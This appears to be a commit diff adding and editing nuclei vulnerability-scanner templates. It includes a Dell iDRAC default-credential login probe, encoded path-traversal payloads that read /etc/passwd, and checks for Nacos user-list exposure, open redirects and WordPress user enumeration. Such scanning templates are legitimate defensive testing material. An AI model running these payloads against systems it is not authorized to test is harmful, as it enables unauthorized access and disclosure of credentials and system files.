commit
cbf9e05e26
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||||
| cves | 206 | vulnerabilities | 98 | exposed-panels | 74 |
|
| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 |
|
||||||
| exposures | 55 | technologies | 46 | misconfiguration | 48 |
|
| exposures | 55 | technologies | 48 | misconfiguration | 48 |
|
||||||
| workflows | 21 | miscellaneous | 14 | default-logins | 11 |
|
| workflows | 22 | miscellaneous | 15 | default-logins | 12 |
|
||||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||||
| helpers | 2 | takeovers | 1 | - | - |
|
| helpers | 2 | takeovers | 1 | - | - |
|
||||||
|
|
||||||
**62 directories, 604 files**.
|
**63 directories, 612 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: dell-idrac-default-login
|
||||||
|
info:
|
||||||
|
name: Dll iDRAC Default login
|
||||||
|
author: kophjager007
|
||||||
|
severity: high
|
||||||
|
tags: dell,idrac,dlogin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
cookie-reuse: true
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/data/login"
|
||||||
|
body: "user=root&password=calvin"
|
||||||
|
headers:
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
|
||||||
|
Content-Type: application/x-www-form-urlencode
|
||||||
|
Referer: "{{BaseURL}}/login.html"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- <authResult>0</authResult>
|
|
@ -24,6 +24,13 @@ requests:
|
||||||
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
||||||
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
||||||
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
|
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
|
||||||
|
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
|
||||||
|
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
|
||||||
|
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
|
||||||
|
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
|
||||||
|
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
|
||||||
|
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: joomla-htaccess-file
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla htaccess file disclosure
|
||||||
|
author: oppsec
|
||||||
|
severity: info
|
||||||
|
description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc...
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/htaccess.txt"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "# @package Joomla"
|
||||||
|
- "Open Source Matters. All rights reserved"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: joomla-manifest-file
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla manifest file disclosure
|
||||||
|
author: oppsec
|
||||||
|
severity: info
|
||||||
|
description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths.
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/administrator/manifests/files/joomla.xml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "admin@joomla.org"
|
||||||
|
- "www.joomla.org"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/xml"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -14,9 +14,15 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- Airflow - DAGs
|
- "Content-Type: text/html"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Airflow - DAGs</title>"
|
||||||
part: body
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -1,30 +1,34 @@
|
||||||
id: unauthenticated-nacos-access
|
id: unauthenticated-nacos-access
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Unauthenticated Nacos access
|
name: Unauthenticated Nacos access v1.x
|
||||||
author: taielab
|
author: taielab & @pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
|
issues: https://github.com/alibaba/nacos/issues/4593
|
||||||
# References:
|
|
||||||
# - https://github.com/alibaba/nacos/issues/4593
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- method: GET
|
||||||
- |
|
path:
|
||||||
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
|
- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
|
||||||
Host: {{Hostname}}
|
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
|
||||||
User-Agent: Nacos-Server
|
headers:
|
||||||
Content-Length: 2
|
User-Agent: Nacos-Server
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Content-Type: application/json"
|
||||||
|
part: header
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '"username":'
|
- '"username":'
|
||||||
- '"password":'
|
- '"password":'
|
||||||
- '"totalCount":'
|
|
||||||
condition: and
|
|
||||||
part: body
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: dell-idrac-detect
|
||||||
|
info:
|
||||||
|
name: Detect Dell iDRAC
|
||||||
|
author: kophjager007
|
||||||
|
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
|
||||||
|
severity: info
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
headers:
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/restgui/start.html"
|
||||||
|
- "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9)
|
||||||
|
- "{{BaseURL}}/login.html"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Dell Integrated Remote Access Controller "
|
||||||
|
- "Integrated Dell Remote Access Controller"
|
||||||
|
- "iDRAC"
|
||||||
|
- "PowerEdge"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- iDRAC/[0-9]{1,2}
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- iDRAC[0-9]{1,2}
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: fwver
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"FwVer" *: *"([^"]+)"'
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: gunicorn-detect
|
||||||
|
info:
|
||||||
|
name: Detect Gunicorn Server
|
||||||
|
author: joanbono
|
||||||
|
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
|
||||||
|
severity: info
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- gunicorn+
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
part: header
|
||||||
|
kval:
|
||||||
|
- Server
|
|
@ -20,7 +20,6 @@ requests:
|
||||||
- '{{BaseURL}}//example.com/..;/css'
|
- '{{BaseURL}}//example.com/..;/css'
|
||||||
- '{{BaseURL}}/example%E3%80%82com'
|
- '{{BaseURL}}/example%E3%80%82com'
|
||||||
- '{{BaseURL}}/%5Cexample.com'
|
- '{{BaseURL}}/%5Cexample.com'
|
||||||
- '{{BaseURL}}example.com'
|
|
||||||
- '{{BaseURL}}/example.com'
|
- '{{BaseURL}}/example.com'
|
||||||
- '{{BaseURL}}\example.com'
|
- '{{BaseURL}}\example.com'
|
||||||
- '{{BaseURL}}//example.com/'
|
- '{{BaseURL}}//example.com/'
|
||||||
|
@ -46,5 +45,5 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com(?:\s*?)$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -2,7 +2,7 @@ id: wordpress-user-enumeration
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Wordpress user enumeration
|
name: Wordpress user enumeration
|
||||||
author: Manas_Harsh
|
author: Manas_Harsh & daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
tags: wordpress
|
tags: wordpress
|
||||||
|
|
||||||
|
@ -10,6 +10,7 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-json/wp/v2/users/"
|
- "{{BaseURL}}/wp-json/wp/v2/users/"
|
||||||
|
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
id: wp-license
|
id: wp-license-file
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress license file disclosure
|
name: WordPress license file disclosure
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: wp-uploads-listing
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Upload Directory Listing Enable
|
||||||
|
author: yashgoti
|
||||||
|
severity: info
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/"
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/2015/"
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/2016/"
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/2017/"
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/2018/"
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/2019/"
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/2020/"
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/2021/"
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Directory listing for"
|
||||||
|
- "Index of /"
|
||||||
|
- "[To Parent Directory]"
|
||||||
|
- "Directory: /"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,11 @@
|
||||||
|
id: dell-idrac-workflow
|
||||||
|
info:
|
||||||
|
name: Dell iDRAC Security Checks
|
||||||
|
author: kophjager007
|
||||||
|
description: A workflow to identify Dell iDRAC instances and run all related nuclei templates.
|
||||||
|
tags: workflow
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
- template: technologies/dell-idrac-detect.yaml
|
||||||
|
subtemplates:
|
||||||
|
- template: default-logins/dell/dell-idrac-default-login.yaml
|
|
@ -44,3 +44,5 @@ workflows:
|
||||||
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
|
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
|
||||||
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
|
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
|
||||||
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
|
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
|
||||||
|
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
|
||||||
|
- template: vulnerabilities/wordpress/wp-license-file.yaml
|
||||||
|
|
Loading…
Reference in New Issue